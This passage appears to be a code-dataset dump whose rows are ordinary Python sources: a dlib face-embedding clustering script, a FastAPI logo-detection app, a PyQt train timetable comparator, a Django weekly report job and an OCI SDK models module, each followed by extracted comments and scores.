then assigns to every cluster the most recurring label in the caption
Starts with the biggest clusters first
Parameters:
-----------
image_jsons: dict
described in `CONTRIBUTING.md`, it contains the path towards precomputed features for every character
t: float, str, optional
Threshold to apply when forming flat clusters.
If 'auto' (case-sensitive) then we use pyannote.core.utils.hierarchy.fcluster_auto
to automatically determine the threshold
Defaults to 0.6 because of dlib (see https://github.com/davisking/dlib-models)
method: str, optional
Method used to calculate the distance between the
newly formed cluster :math:`u` and each :math:`v`
see scipy.cluster.hierarchy.linkage
KEEP_IMAGE_TYPES: set, optional
Restricts the cluster to features which were computed on a given imageType (e.g. 'still_frame')
See `CONTRIBUTING.md`
Defaults to keep all features (i.e. None)
keep_faces: bool, optional
keep track of rgb image of faces (cropped with the bounding box)
for debugging and visualization.
Heavy in memory.
Defaults to False.
Returns:
--------
image_jsons: dict
updated database with the path towards the reference embedding
"""
features=[]
save_labels=[]
if keep_faces:
import matplotlib.pyplot as plt
faces=[]
#Clusters over every image in image_jsons
for i,image in enumerate(image_jsons['allImages']):
print((
f"\rimage {i+1}/{image_jsons['totalImageCount']}."
),end=" ")
if 'features' not in image:
continue
if KEEP_IMAGE_TYPES is not None:
if image['imageType'] not in KEEP_IMAGE_TYPES:
continue
if keep_faces:
rgb=imageio.imread(image['path'][0])
frame_height=rgb.shape[0]
frame_width=rgb.shape[1]
for feature in np.load(image['features'][0]):#this way we skip those that are empty (because no (frontal) face was detected)
features.append(feature["embeddings"])
save_labels.append(image['label'])
if keep_faces:
left, top, right, bottom=scale_up_bbox(feature["bbox"],frame_width,frame_height)
faces.append(rgb[top:bottom,left:right])
features=np.vstack(features)
#clustering
Z=linkage(features,method=method, metric='euclidean')
if t == 'auto':
clustering=fcluster_auto(features,Z, metric='euclidean')
else:
clustering=fcluster(Z,t,criterion='distance')
unique, counts = np.unique(clustering, return_counts=True)
#assigns to every cluster the most recurring label in the caption
assigned_labels=[]
unassigned_clusters=[]
sorted_counts=np.sort(np.unique(counts))[::-1]
keep_centroid=[]
for count in sorted_counts:
for cluster in np.where(counts==count)[0]:#start with the biggest clusters
cluster_i=np.where(clustering==unique[cluster])[0]#get the indexes of the cluster
cluster_labels=np.array(save_labels)[cluster_i]#get the labels associated to the cluster
#flatten the labels
flat_cluster_labels = np.array([label for labels in cluster_labels for label in labels])
unique_labels, count_labels = np.unique(flat_cluster_labels, return_counts=True)
#assign the most reccuring label to the cluster
cluster_label=unique_labels[np.argmax(count_labels)]
#except if we already assigned it to a bigger cluster
if cluster_label in assigned_labels:
unassigned_clusters.append(cluster)
continue
#save reference and update image_jsons
str_KEEP_IMAGE_TYPES = ".".join(KEEP_IMAGE_TYPES) if KEEP_IMAGE_TYPES is not None else str(KEEP_IMAGE_TYPES)
output_path=os.path.join(IMAGE_PATH,cluster_label,f'{str_KEEP_IMAGE_TYPES}.{MODEL_NAME}.{cluster_label}.{method}.{t}.references.npy')
np.save(output_path,features[cluster_i])
if "references" in image_jsons['characters'][cluster_label]:
image_jsons['characters'][cluster_label]["references"].append(output_path)
else:
image_jsons['characters'][cluster_label]["references"]=[output_path]
assigned_labels.append(cluster_label)
if keep_faces:
distance_from_cluster=np.mean(squareform(pdist(features[cluster_i],metric='euclidean')),axis=0)
centroid_face=faces[cluster_i[np.argmin(distance_from_cluster)]]
keep_centroid.append(centroid_face)
print(f"assigned {len(assigned_labels)} labels over {len(unique)} clusters")
print(f"those cluster were not assigned any label :\n{unassigned_clusters}")
if keep_faces:
plt.figure(figsize=(16,16))
cols=int(np.sqrt(len(assigned_labels)))+1
for i,label in enumerate(assigned_labels):
plt.subplot(cols,cols,i+1)
plt.title(label[:12]+str(image_jsons['characters'][label]['count']))
centroid_path=os.path.join(IMAGE_PATH,label,
f'{str_KEEP_IMAGE_TYPES}.{MODEL_NAME}.{label}.{method}.{t}.centroid.png')
imageio.imwrite(centroid_path,keep_centroid[i])
image_jsons['characters'][label]["centroid"]=centroid_path
plt.axis('off')
plt.savefig(os.path.join(IMAGE_PATH,"centroids.png"))
return image_jsons
def compute_references_per_character(image_jsons,t=0.6,method='complete',MIN_IMAGES=1,KEEP_IMAGE_TYPES=None):
"""
Cluster over each character folder if it has at least `MIN_IMAGES` images features in it
then save the biggest cluster as the character reference.
The file should be named like `<model_name>.<MIN_IMAGES>.<character_uri>.npy`.
It should contain one line per reference embedding.
Parameters:
-----------
image_jsons: dict
described in `CONTRIBUTING.md`, it contains the path towards precomputed features for every character
t: float, str, optional
Threshold to apply when forming flat clusters.
If 'auto' (case-sensitive) then we use pyannote.core.utils.hierarchy.fcluster_auto
to automatically determine the threshold
Defaults to 0.6 because of dlib (see https://github.com/davisking/dlib-models)
method: str, optional
Method used to calculate the distance between the
newly formed cluster :math:`u` and each :math:`v`
see scipy.cluster.hierarchy.linkage
MIN_IMAGES: int, optional
compute the references embeddings of every character which has at least MIN_IMAGES.
Defaults to compute references for every character which has an image (i.e. 1)
KEEP_IMAGE_TYPES: set, optional
Restricts the cluster to features which were computed on a given imageType (e.g. 'still_frame')
See `CONTRIBUTING.md`
Defaults to keep all features (i.e. None)
Returns:
--------
image_jsons: dict
updated database with the path towards the reference embedding
"""
warnings.warn("This function has been deprecated in favor of compute_references")
n_characters=len(image_jsons['characters'])
for i,(name,character) in enumerate(image_jsons['characters'].items()):
print(f"\rprocessing {name} ({i}/{n_characters})",end=" ")
#using len(character['features']) instead of characer['count']
# as some images do not contain frontal face or are grayscale
if 'features' in character and len(character['features'])>=MIN_IMAGES:
references=compute_reference(character,t,method,KEEP_IMAGE_TYPES,keep_faces=False)
str_KEEP_IMAGE_TYPES = ".".join(KEEP_IMAGE_TYPES) if KEEP_IMAGE_TYPES is not None else str(KEEP_IMAGE_TYPES)
output_path=os.path.join(IMAGE_PATH,name,f'{str_KEEP_IMAGE_TYPES}.{MODEL_NAME}.{name}.{method}.references.npy')
np.save(output_path,references)
if "references" in character:
image_jsons['characters'][name]["references"].append(output_path)
else:
image_jsons['characters'][name]["references"]=[output_path]
return image_jsons
def main(image_jsons,IMAGE_PATH):
image_jsons=compute_features(image_jsons,MODEL_NAME,DLIB_LANDMARKS,DLIB_EMBEDDING)
with open(os.path.join(IMAGE_PATH,"images.json"),"w") as file:
json.dump(image_jsons,file)
image_jsons=compute_references(image_jsons,IMAGE_PATH,CLUSTERING_THRESHOLD,CLUSTERING_METHOD,KEEP_IMAGE_TYPES,keep_faces=True)
print("\ndone computing features and references ;)")
return image_jsons
if __name__ == '__main__':
with open(os.path.join(IMAGE_PATH,"images.json"),"r") as file:
image_jsons=json.load(file)
image_jsons=main(image_jsons,IMAGE_PATH)
with open(os.path.join(IMAGE_PATH,"images.json"),"w") as file:
json.dump(image_jsons,file)
| en | 0.794151 | #!/usr/bin/env python # coding: utf-8 Extracts features from images given IMDB-compliant JSON file, described in `CONTRIBUTING.md` (scraped in `image_scraping`) # Dependencies ## core ## ML/image processing ## clustering #Hyperparameters are defined in scripts/images.py #threshold for clustering, see https://github.com/davisking/dlib-models #'auto' Facial features detection for an rgb image Parameters ---------- rgb : np.array RGB image to be processed landmarks : str Path to dlib's 68 facial landmarks predictor model. embedding : str Path to dlib's face embedding model. output : str Path to features result file (should end with `.npy`). return_landmarks : bool Whether to save landmarks. Defaults to False. return_embedding : bool Whether to save embedding. Defaults to False. #HACK should not be necessary if images have been scrapped with a low enough MAX_FILE_NAME_LENGTH #" #dlib doesn't handle grayscale images #update features path per image #update features path per character Cluster over features then save the biggest cluster as reference. The file should be named like `<model_name>.<MIN_IMAGES>.<character_uri>.npy`. It should contain one line per reference embedding. Parameters: ----------- character: dict described in `CONTRIBUTING.md`, it contains the path towards precomputed features. t: float, str, optional Threshold to apply when forming flat clusters. If 'auto' (case-sensitive) then we use pyannote.core.utils.hierarchy.fcluster_auto to automatically determine the threshold Defaults to 0.6 because of dlib (see https://github.com/davisking/dlib-models) method: str, optional Method used to calculate the distance between the newly formed cluster :math:`u` and each :math:`v` see scipy.cluster.hierarchy.linkage KEEP_IMAGE_TYPES: set, optional Restricts the cluster to features which were computed on a given imageType (e.g. 'still_frame') See `CONTRIBUTING.md` Defaults to keep all features (i.e. None) keep_faces: bool, optional keep track of rgb image of faces (cropped with the bounding box) for debugging and visualization Returns: -------- references: numpy array, contains one embedding per line faces: list, optional a list of all faces in the character images Returns only if keep_faces #this way we skip those that are empty (because no (frontal) face was detected) #clustering Clusters over every image in image_jsons then assigns to every cluster the most recurring label in the caption Starts with the biggest clusters first Parameters: ----------- image_jsons: dict described in `CONTRIBUTING.md`, it contains the path towards precomputed features for every character t: float, str, optional Threshold to apply when forming flat clusters. If 'auto' (case-sensitive) then we use pyannote.core.utils.hierarchy.fcluster_auto to automatically determine the threshold Defaults to 0.6 because of dlib (see https://github.com/davisking/dlib-models) method: str, optional Method used to calculate the distance between the newly formed cluster :math:`u` and each :math:`v` see scipy.cluster.hierarchy.linkage KEEP_IMAGE_TYPES: set, optional Restricts the cluster to features which were computed on a given imageType (e.g. 'still_frame') See `CONTRIBUTING.md` Defaults to keep all features (i.e. None) keep_faces: bool, optional keep track of rgb image of faces (cropped with the bounding box) for debugging and visualization. Heavy in memory. Defaults to False. Returns: -------- image_jsons: dict updated database with the path towards the reference embedding #Clusters over every image in image_jsons #this way we skip those that are empty (because no (frontal) face was detected) #clustering #assigns to every cluster the most recurring label in the caption #start with the biggest clusters #get the indexes of the cluster #get the labels associated to the cluster #flatten the labels #assign the most reccuring label to the cluster #except if we already assigned it to a bigger cluster #save reference and update image_jsons Cluster over each character folder if it has at least `MIN_IMAGES` images features in it then save the biggest cluster as the character reference. The file should be named like `<model_name>.<MIN_IMAGES>.<character_uri>.npy`. It should contain one line per reference embedding. Parameters: ----------- image_jsons: dict described in `CONTRIBUTING.md`, it contains the path towards precomputed features for every character t: float, str, optional Threshold to apply when forming flat clusters. If 'auto' (case-sensitive) then we use pyannote.core.utils.hierarchy.fcluster_auto to automatically determine the threshold Defaults to 0.6 because of dlib (see https://github.com/davisking/dlib-models) method: str, optional Method used to calculate the distance between the newly formed cluster :math:`u` and each :math:`v` see scipy.cluster.hierarchy.linkage MIN_IMAGES: int, optional compute the references embeddings of every character which has at least MIN_IMAGES. Defaults to compute references for every character which has an image (i.e. 1) KEEP_IMAGE_TYPES: set, optional Restricts the cluster to features which were computed on a given imageType (e.g. 'still_frame') See `CONTRIBUTING.md` Defaults to keep all features (i.e. None) Returns: -------- image_jsons: dict updated database with the path towards the reference embedding #using len(character['features']) instead of characer['count'] # as some images do not contain frontal face or are grayscale | 2.263963 | 2 |
src/api/app.py | DenisioMytnysiano/lodetta | 0 | 6616657 | import uvicorn
from fastapi import FastAPI
from starlette_exporter import PrometheusMiddleware, handle_metrics
from api.extensions.utils import get_logger
from database.populate import main as populate_database
from routers import LogoRouter, DetectorRouter
app = FastAPI(
title="Lodetta",
description="Simple and easily deployable logo detection API written in Python",
version="0.1.0"
)
app.add_middleware(PrometheusMiddleware)
app.add_route("/metrics", handle_metrics)
@app.on_event("startup")
async def startup():
populate_database()
@app.get("/", tags=["Root"])
async def root():
return {"message": "Welcome to lodetta - simple logo detection API."}
app.include_router(LogoRouter, tags=["Logo"], prefix="/logo")
app.include_router(DetectorRouter, tags=["Detector"], prefix="/detector")
if __name__ == '__main__':
uvicorn.run(app, port=8080, host='0.0.0.0')
| import uvicorn
from fastapi import FastAPI
from starlette_exporter import PrometheusMiddleware, handle_metrics
from api.extensions.utils import get_logger
from database.populate import main as populate_database
from routers import LogoRouter, DetectorRouter
app = FastAPI(
title="Lodetta",
description="Simple and easily deployable logo detection API written in Python",
version="0.1.0"
)
app.add_middleware(PrometheusMiddleware)
app.add_route("/metrics", handle_metrics)
@app.on_event("startup")
async def startup():
populate_database()
@app.get("/", tags=["Root"])
async def root():
return {"message": "Welcome to lodetta - simple logo detection API."}
app.include_router(LogoRouter, tags=["Logo"], prefix="/logo")
app.include_router(DetectorRouter, tags=["Detector"], prefix="/detector")
if __name__ == '__main__':
uvicorn.run(app, port=8080, host='0.0.0.0')
| none | 1 | 2.125019 | 2 | |
libs/train_graph/train_graph/trainComparator.py | denglihong2007/Parsing_12306 | 1 | 6616658 | <gh_stars>1-10
"""
两车次比较的对话框
"""
from PyQt5 import QtWidgets,QtGui,QtCore
from PyQt5.QtCore import Qt
from .data.train import Train
from .data.graph import Graph,Train,Line
class TrainComparator(QtWidgets.QDialog):
def __init__(self,graph:Graph,parent=None):
super(TrainComparator, self).__init__(parent)
self.resize(600,600)
self.setWindowTitle('车次运行对照')
self.graph = graph
self.train1 = None
self.train2 = None
self.initWidget()
def initWidget(self):
layout = QtWidgets.QVBoxLayout()
label = QtWidgets.QLabel("本功能对比两车次在本线各区间运行数据,两车次皆不经过的区间将被省略。"
"若车次跨越中间车站,则该区间数据不会显示。两者不同的区间,背景红色是较快的"
"一方,蓝色是较慢的一方。颜色深浅由差异程度决定。")
label.setWordWrap(True)
layout.addWidget(label)
hlayout = QtWidgets.QHBoxLayout()
combo1 = QtWidgets.QComboBox(self)
combo2 = QtWidgets.QComboBox(self)
self.combo1 = combo1
self.combo2 = combo2
combo1.addItem('请选择车次')
combo1.setEditable(True)
combo2.addItem('请选择车次')
combo2.setEditable(True)
for train in self.graph.trains():
combo1.addItem(train.fullCheci())
combo2.addItem(train.fullCheci())
hlayout.addWidget(combo1)
hlayout.addWidget(QtWidgets.QLabel('—'))
hlayout.addWidget(combo2)
layout.addLayout(hlayout)
combo1.currentTextChanged.connect(self._train1_changed)
combo2.currentTextChanged.connect(self._train2_changed)
tableWidget = QtWidgets.QTableWidget(self)
self.tableWidget = tableWidget
tableWidget.setColumnCount(7)
tableWidget.setHorizontalHeaderLabels(('区间','历时1','均速1','附加1','历时2','均速2','附加2'))
for i,s in enumerate((120,80,80,60,80,80,60)):
tableWidget.setColumnWidth(i,s)
self.tableWidget.setEditTriggers(tableWidget.NoEditTriggers)
layout.addWidget(tableWidget)
self.setLayout(layout)
def setTableWidget(self):
self.tableWidget.setRowCount(0)
if self.train1 is None and self.train2 is None:
return
self.addDirData(True)
self.addDirData(False)
checis = [train.fullCheci() if train is not None else 'null' for train in (self.train1,self.train2)]
self.setWindowTitle('车次运行对照*{}-{}'.format(*checis))
def addDirData(self,down:bool):
previous = None
for st_dict in self.graph.stationDicts(reverse=not down):
if previous is None:
# 第一个和最后一个站肯定是双向通过,不用试
previous = st_dict
continue
if not st_dict.get('direction', Line.BothVia) &(Line.DownVia if down else Line.UpVia):
continue
mile = st_dict['licheng'] - previous['licheng']
if not down:
mile = -mile
try:
sec1 = self.train1.gapBetweenStation(previous['zhanming'], st_dict['zhanming'])
tm1_str = f"{int(sec1/60)}:{sec1%60:02d}"
except:
sec1 = 0
tm1_str = '-'
if sec1 > 3600*24-sec1:
sec1 = 0
tm1_str = '-'
if sec1:
speed1 = 1000 * mile / sec1 * 3.6
speed1_str = f"{speed1:.2f}"
self.train1:Train
append_str1 = self.train1.stationStopBehaviour_single(previous['zhanming'],True)+\
self.train1.stationStopBehaviour_single(st_dict['zhanming'],False)
else:
speed1 = 0
speed1_str = '-'
append_str1 = '-'
try:
sec2 = self.train2.gapBetweenStation(previous['zhanming'], st_dict['zhanming'])
tm2_str = f"{int(sec2/60)}:{sec2%60:02d}"
except:
sec2 = 0
tm2_str = '-'
if sec2 > 3600*24-sec2:
sec2 = 0
tm2_str = '-'
if sec2:
speed2 = 1000 * mile / sec2 * 3.6
speed2_str = f"{speed2:.2f}"
append_str2 = self.train2.stationStopBehaviour_single(previous['zhanming'],True) + \
self.train2.stationStopBehaviour_single(st_dict['zhanming'],False)
else:
speed2 = 0
speed2_str = '-'
append_str2 = '-'
if not sec1 and not sec2:
previous = st_dict
continue
row = self.tableWidget.rowCount()
self.tableWidget.insertRow(row)
self.tableWidget.setRowHeight(row,self.graph.UIConfigData()['table_row_height'])
self.tableWidget.setItem(row,0,
QtWidgets.QTableWidgetItem(f"{previous['zhanming']}->{st_dict['zhanming']}"))
item1 = QtWidgets.QTableWidgetItem(tm1_str)
item2 = QtWidgets.QTableWidgetItem(speed1_str)
item3 = QtWidgets.QTableWidgetItem(append_str1)
item4 = QtWidgets.QTableWidgetItem(tm2_str)
item5 = QtWidgets.QTableWidgetItem(speed2_str)
item6 = QtWidgets.QTableWidgetItem(append_str2)
if sec1 and sec2 and sec1 != sec2:
alpha1 = abs(sec1-sec2)/sec1*200+55
alpha2 = abs(sec1-sec2)/sec2*200+55
if sec1 < sec2:
color1 = QtGui.QColor(Qt.red)
color2 = QtGui.QColor(Qt.blue)
else:
color1 = QtGui.QColor(Qt.blue)
color2 = QtGui.QColor(Qt.red)
color1.setAlpha(alpha1)
color2.setAlpha(alpha2)
item1.setBackground(QtGui.QBrush(color1))
item2.setBackground(QtGui.QBrush(color1))
item3.setBackground(QtGui.QBrush(color1))
item4.setBackground(QtGui.QBrush(color2))
item5.setBackground(QtGui.QBrush(color2))
item6.setBackground(QtGui.QBrush(color2))
for i,s in enumerate((item1,item2,item3,item4,item5,item6)):
self.tableWidget.setItem(row,i+1,s)
previous = st_dict
# slots
def _train1_changed(self,checi):
if checi == '请选择车次':
self.train1 = None
else:
self.train1 = self.graph.trainFromCheci(checi,True)
self.setTableWidget()
def _train2_changed(self,checi):
if checi == '请选择车次':
self.train2 = None
else:
self.train2 = self.graph.trainFromCheci(checi,True)
self.setTableWidget() | """
两车次比较的对话框
"""
from PyQt5 import QtWidgets,QtGui,QtCore
from PyQt5.QtCore import Qt
from .data.train import Train
from .data.graph import Graph,Train,Line
class TrainComparator(QtWidgets.QDialog):
def __init__(self,graph:Graph,parent=None):
super(TrainComparator, self).__init__(parent)
self.resize(600,600)
self.setWindowTitle('车次运行对照')
self.graph = graph
self.train1 = None
self.train2 = None
self.initWidget()
def initWidget(self):
layout = QtWidgets.QVBoxLayout()
label = QtWidgets.QLabel("本功能对比两车次在本线各区间运行数据,两车次皆不经过的区间将被省略。"
"若车次跨越中间车站,则该区间数据不会显示。两者不同的区间,背景红色是较快的"
"一方,蓝色是较慢的一方。颜色深浅由差异程度决定。")
label.setWordWrap(True)
layout.addWidget(label)
hlayout = QtWidgets.QHBoxLayout()
combo1 = QtWidgets.QComboBox(self)
combo2 = QtWidgets.QComboBox(self)
self.combo1 = combo1
self.combo2 = combo2
combo1.addItem('请选择车次')
combo1.setEditable(True)
combo2.addItem('请选择车次')
combo2.setEditable(True)
for train in self.graph.trains():
combo1.addItem(train.fullCheci())
combo2.addItem(train.fullCheci())
hlayout.addWidget(combo1)
hlayout.addWidget(QtWidgets.QLabel('—'))
hlayout.addWidget(combo2)
layout.addLayout(hlayout)
combo1.currentTextChanged.connect(self._train1_changed)
combo2.currentTextChanged.connect(self._train2_changed)
tableWidget = QtWidgets.QTableWidget(self)
self.tableWidget = tableWidget
tableWidget.setColumnCount(7)
tableWidget.setHorizontalHeaderLabels(('区间','历时1','均速1','附加1','历时2','均速2','附加2'))
for i,s in enumerate((120,80,80,60,80,80,60)):
tableWidget.setColumnWidth(i,s)
self.tableWidget.setEditTriggers(tableWidget.NoEditTriggers)
layout.addWidget(tableWidget)
self.setLayout(layout)
def setTableWidget(self):
self.tableWidget.setRowCount(0)
if self.train1 is None and self.train2 is None:
return
self.addDirData(True)
self.addDirData(False)
checis = [train.fullCheci() if train is not None else 'null' for train in (self.train1,self.train2)]
self.setWindowTitle('车次运行对照*{}-{}'.format(*checis))
def addDirData(self,down:bool):
previous = None
for st_dict in self.graph.stationDicts(reverse=not down):
if previous is None:
# 第一个和最后一个站肯定是双向通过,不用试
previous = st_dict
continue
if not st_dict.get('direction', Line.BothVia) &(Line.DownVia if down else Line.UpVia):
continue
mile = st_dict['licheng'] - previous['licheng']
if not down:
mile = -mile
try:
sec1 = self.train1.gapBetweenStation(previous['zhanming'], st_dict['zhanming'])
tm1_str = f"{int(sec1/60)}:{sec1%60:02d}"
except:
sec1 = 0
tm1_str = '-'
if sec1 > 3600*24-sec1:
sec1 = 0
tm1_str = '-'
if sec1:
speed1 = 1000 * mile / sec1 * 3.6
speed1_str = f"{speed1:.2f}"
self.train1:Train
append_str1 = self.train1.stationStopBehaviour_single(previous['zhanming'],True)+\
self.train1.stationStopBehaviour_single(st_dict['zhanming'],False)
else:
speed1 = 0
speed1_str = '-'
append_str1 = '-'
try:
sec2 = self.train2.gapBetweenStation(previous['zhanming'], st_dict['zhanming'])
tm2_str = f"{int(sec2/60)}:{sec2%60:02d}"
except:
sec2 = 0
tm2_str = '-'
if sec2 > 3600*24-sec2:
sec2 = 0
tm2_str = '-'
if sec2:
speed2 = 1000 * mile / sec2 * 3.6
speed2_str = f"{speed2:.2f}"
append_str2 = self.train2.stationStopBehaviour_single(previous['zhanming'],True) + \
self.train2.stationStopBehaviour_single(st_dict['zhanming'],False)
else:
speed2 = 0
speed2_str = '-'
append_str2 = '-'
if not sec1 and not sec2:
previous = st_dict
continue
row = self.tableWidget.rowCount()
self.tableWidget.insertRow(row)
self.tableWidget.setRowHeight(row,self.graph.UIConfigData()['table_row_height'])
self.tableWidget.setItem(row,0,
QtWidgets.QTableWidgetItem(f"{previous['zhanming']}->{st_dict['zhanming']}"))
item1 = QtWidgets.QTableWidgetItem(tm1_str)
item2 = QtWidgets.QTableWidgetItem(speed1_str)
item3 = QtWidgets.QTableWidgetItem(append_str1)
item4 = QtWidgets.QTableWidgetItem(tm2_str)
item5 = QtWidgets.QTableWidgetItem(speed2_str)
item6 = QtWidgets.QTableWidgetItem(append_str2)
if sec1 and sec2 and sec1 != sec2:
alpha1 = abs(sec1-sec2)/sec1*200+55
alpha2 = abs(sec1-sec2)/sec2*200+55
if sec1 < sec2:
color1 = QtGui.QColor(Qt.red)
color2 = QtGui.QColor(Qt.blue)
else:
color1 = QtGui.QColor(Qt.blue)
color2 = QtGui.QColor(Qt.red)
color1.setAlpha(alpha1)
color2.setAlpha(alpha2)
item1.setBackground(QtGui.QBrush(color1))
item2.setBackground(QtGui.QBrush(color1))
item3.setBackground(QtGui.QBrush(color1))
item4.setBackground(QtGui.QBrush(color2))
item5.setBackground(QtGui.QBrush(color2))
item6.setBackground(QtGui.QBrush(color2))
for i,s in enumerate((item1,item2,item3,item4,item5,item6)):
self.tableWidget.setItem(row,i+1,s)
previous = st_dict
# slots
def _train1_changed(self,checi):
if checi == '请选择车次':
self.train1 = None
else:
self.train1 = self.graph.trainFromCheci(checi,True)
self.setTableWidget()
def _train2_changed(self,checi):
if checi == '请选择车次':
self.train2 = None
else:
self.train2 = self.graph.trainFromCheci(checi,True)
self.setTableWidget() | zh | 0.983061 | 两车次比较的对话框 # 第一个和最后一个站肯定是双向通过,不用试 # slots | 2.902761 | 3 |
apps/hq/jobs/weekly/supervisor_report.py | commtrack/commtrack-old-to-del | 1 | 6616659 | <gh_stars>1-10
from django_extensions.management.jobs import WeeklyJob
import hq.reporter as reporter
class Job(WeeklyJob):
help = "Supervisor Weekly Report Job."
def _doEmailReports(self):
pass
def _doSMSReports(self):
pass
def execute(self):
reporter.run_reports('weekly')
| from django_extensions.management.jobs import WeeklyJob
import hq.reporter as reporter
class Job(WeeklyJob):
help = "Supervisor Weekly Report Job."
def _doEmailReports(self):
pass
def _doSMSReports(self):
pass
def execute(self):
reporter.run_reports('weekly') | none | 1 | 1.721618 | 2 | |
src/oci/database_management/models/__init__.py | Manny27nyc/oci-python-sdk | 249 | 6616660 | <gh_stars>100-1000
# coding: utf-8
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from __future__ import absolute_import
from .activity_time_series_metrics import ActivityTimeSeriesMetrics
from .add_managed_database_to_managed_database_group_details import AddManagedDatabaseToManagedDatabaseGroupDetails
from .allowed_parameter_value import AllowedParameterValue
from .associated_database_collection import AssociatedDatabaseCollection
from .associated_database_summary import AssociatedDatabaseSummary
from .awr_db_collection import AwrDbCollection
from .awr_db_cpu_usage_collection import AwrDbCpuUsageCollection
from .awr_db_cpu_usage_summary import AwrDbCpuUsageSummary
from .awr_db_metric_collection import AwrDbMetricCollection
from .awr_db_metric_summary import AwrDbMetricSummary
from .awr_db_parameter_change_collection import AwrDbParameterChangeCollection
from .awr_db_parameter_change_summary import AwrDbParameterChangeSummary
from .awr_db_parameter_collection import AwrDbParameterCollection
from .awr_db_parameter_summary import AwrDbParameterSummary
from .awr_db_report import AwrDbReport
from .awr_db_snapshot_collection import AwrDbSnapshotCollection
from .awr_db_snapshot_range_collection import AwrDbSnapshotRangeCollection
from .awr_db_snapshot_range_summary import AwrDbSnapshotRangeSummary
from .awr_db_snapshot_summary import AwrDbSnapshotSummary
from .awr_db_sql_report import AwrDbSqlReport
from .awr_db_summary import AwrDbSummary
from .awr_db_sysstat_collection import AwrDbSysstatCollection
from .awr_db_sysstat_summary import AwrDbSysstatSummary
from .awr_db_top_wait_event_collection import AwrDbTopWaitEventCollection
from .awr_db_top_wait_event_summary import AwrDbTopWaitEventSummary
from .awr_db_wait_event_bucket_collection import AwrDbWaitEventBucketCollection
from .awr_db_wait_event_bucket_summary import AwrDbWaitEventBucketSummary
from .awr_db_wait_event_collection import AwrDbWaitEventCollection
from .awr_db_wait_event_summary import AwrDbWaitEventSummary
from .awr_query_result import AwrQueryResult
from .change_database_parameter_details import ChangeDatabaseParameterDetails
from .change_database_parameters_details import ChangeDatabaseParametersDetails
from .change_db_management_private_endpoint_compartment_details import ChangeDbManagementPrivateEndpointCompartmentDetails
from .change_job_compartment_details import ChangeJobCompartmentDetails
from .change_managed_database_group_compartment_details import ChangeManagedDatabaseGroupCompartmentDetails
from .child_database import ChildDatabase
from .cluster_cache_metric import ClusterCacheMetric
from .create_db_management_private_endpoint_details import CreateDbManagementPrivateEndpointDetails
from .create_job_details import CreateJobDetails
from .create_managed_database_group_details import CreateManagedDatabaseGroupDetails
from .create_sql_job_details import CreateSqlJobDetails
from .database_credentials import DatabaseCredentials
from .database_fleet_health_metrics import DatabaseFleetHealthMetrics
from .database_home_metric_definition import DatabaseHomeMetricDefinition
from .database_home_metrics import DatabaseHomeMetrics
from .database_io_aggregate_metrics import DatabaseIOAggregateMetrics
from .database_instance_home_metrics_definition import DatabaseInstanceHomeMetricsDefinition
from .database_parameter_summary import DatabaseParameterSummary
from .database_parameter_update_status import DatabaseParameterUpdateStatus
from .database_parameters_collection import DatabaseParametersCollection
from .database_storage_aggregate_metrics import DatabaseStorageAggregateMetrics
from .database_time_aggregate_metrics import DatabaseTimeAggregateMetrics
from .database_usage_metrics import DatabaseUsageMetrics
from .datafile import Datafile
from .db_management_private_endpoint import DbManagementPrivateEndpoint
from .db_management_private_endpoint_collection import DbManagementPrivateEndpointCollection
from .db_management_private_endpoint_summary import DbManagementPrivateEndpointSummary
from .fleet_metric_definition import FleetMetricDefinition
from .fleet_metric_summary_definition import FleetMetricSummaryDefinition
from .fleet_status_by_category import FleetStatusByCategory
from .fleet_summary import FleetSummary
from .instance_details import InstanceDetails
from .job import Job
from .job_collection import JobCollection
from .job_database import JobDatabase
from .job_execution import JobExecution
from .job_execution_collection import JobExecutionCollection
from .job_execution_result_details import JobExecutionResultDetails
from .job_execution_result_location import JobExecutionResultLocation
from .job_execution_summary import JobExecutionSummary
from .job_executions_status_summary import JobExecutionsStatusSummary
from .job_executions_status_summary_collection import JobExecutionsStatusSummaryCollection
from .job_run import JobRun
from .job_run_collection import JobRunCollection
from .job_run_summary import JobRunSummary
from .job_schedule_details import JobScheduleDetails
from .job_summary import JobSummary
from .managed_database import ManagedDatabase
from .managed_database_collection import ManagedDatabaseCollection
from .managed_database_group import ManagedDatabaseGroup
from .managed_database_group_collection import ManagedDatabaseGroupCollection
from .managed_database_group_summary import ManagedDatabaseGroupSummary
from .managed_database_summary import ManagedDatabaseSummary
from .memory_aggregate_metrics import MemoryAggregateMetrics
from .metric_data_point import MetricDataPoint
from .metric_dimension_definition import MetricDimensionDefinition
from .object_storage_job_execution_result_details import ObjectStorageJobExecutionResultDetails
from .object_storage_job_execution_result_location import ObjectStorageJobExecutionResultLocation
from .parent_group import ParentGroup
from .pdb_metrics import PdbMetrics
from .pdb_status_details import PdbStatusDetails
from .remove_managed_database_from_managed_database_group_details import RemoveManagedDatabaseFromManagedDatabaseGroupDetails
from .reset_database_parameters_details import ResetDatabaseParametersDetails
from .sql_job import SqlJob
from .tablespace import Tablespace
from .tablespace_collection import TablespaceCollection
from .tablespace_summary import TablespaceSummary
from .time_series_metric_data_point import TimeSeriesMetricDataPoint
from .time_series_metric_definition import TimeSeriesMetricDefinition
from .update_database_parameters_result import UpdateDatabaseParametersResult
from .update_db_management_private_endpoint_details import UpdateDbManagementPrivateEndpointDetails
from .update_job_details import UpdateJobDetails
from .update_managed_database_group_details import UpdateManagedDatabaseGroupDetails
from .update_sql_job_details import UpdateSqlJobDetails
from .work_request import WorkRequest
from .work_request_collection import WorkRequestCollection
from .work_request_error import WorkRequestError
from .work_request_error_collection import WorkRequestErrorCollection
from .work_request_log_entry import WorkRequestLogEntry
from .work_request_log_entry_collection import WorkRequestLogEntryCollection
from .work_request_resource import WorkRequestResource
from .work_request_summary import WorkRequestSummary
# Maps type names to classes for database_management services.
database_management_type_mapping = {
"ActivityTimeSeriesMetrics": ActivityTimeSeriesMetrics,
"AddManagedDatabaseToManagedDatabaseGroupDetails": AddManagedDatabaseToManagedDatabaseGroupDetails,
"AllowedParameterValue": AllowedParameterValue,
"AssociatedDatabaseCollection": AssociatedDatabaseCollection,
"AssociatedDatabaseSummary": AssociatedDatabaseSummary,
"AwrDbCollection": AwrDbCollection,
"AwrDbCpuUsageCollection": AwrDbCpuUsageCollection,
